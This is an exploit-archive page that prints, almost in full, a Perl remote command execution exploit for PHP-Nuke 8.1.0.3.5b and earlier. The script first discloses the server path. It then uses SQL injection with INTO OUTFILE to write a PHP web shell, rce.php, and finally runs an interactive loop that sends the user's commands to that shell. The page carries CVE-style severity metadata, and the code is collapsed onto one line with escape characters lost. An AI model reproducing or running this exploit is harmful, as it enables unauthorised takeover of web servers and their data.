Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A (No CVE assigned) | CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | Price not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2010-07-13 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit # Author/s: Dante90 & yawn # Contact Us: www.unitx.net # Requirements: magic_quotes_gpc : off # Greetings: #[email protected] | #[email protected] # You will remember, Watson, how the dreadful business of the # Abernetty family was first brought to my notice by the depth which the # parsley had sunk into the butter upon a hot day. # -- Sherlock Holmes use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; sub Nuke::Usage { print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploitn"; print " ------------------------------------------------------ n"; print " * USAGE: *n"; print " * cd [Local Disk]:\ *n"; print " * perl name_exploit.pl [host] [username] [password] *n"; print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *n"; print " ------------------------------------------------------ n"; print " * Powered By Dante90 & yawn *n"; print " * www.unitx.net *n"; print " ------------------------------------------------------ n"; } #VARS system $^O eq 'MSWin32' ? 'cls' : 'clear'; Nuke::Usage(); my $host = shift || die; my $cmd; my $shell = "<?php echo system($_GET["cmd"]); ?>"; # Change Here to Set your custom shell (for example use system() ); my $cookies = HTTP::Cookies->new; my $request = LWP::UserAgent->new; $request->agent("Mozilla 5/0"); $request->cookie_jar($cookies); #END VARS sub Full_Path_Disclosure() { my $Get = $request->get($host.'themes/NukeNews/theme.php'); if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) { return $1; } else { return "failed"; } } print " * Getting Full Pathn"; my $path = Full_Path_Disclosure(); die " * Failed Path Extraction" if ($path eq "failed"); $path =~ s/themes(/|\)NukeNews(/|\)theme.php//g; print " * Full Path Found: $pathn"; if ($path =~ m/\/) { $path =~ s/\/\\\\/g; } print " * Injecting Shell To $hostn"; my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF", { check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php", }, Referer => $host."index.php"); print " * Injecting Successfully Completedn"; print " * Shell now available on $host"."rce.phpn"; print " * Connecting to remote shelln"; sleep(4); print " * Connected.. Type "quit" to quitn"; while() { print "* root@backdoor ~$ "; $cmd = <>; chomp($cmd); last if $cmd eq "quit"; $req2 = $request->get($host."/rce.php?cmd=".$cmd); print $req2->content."n"; }
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.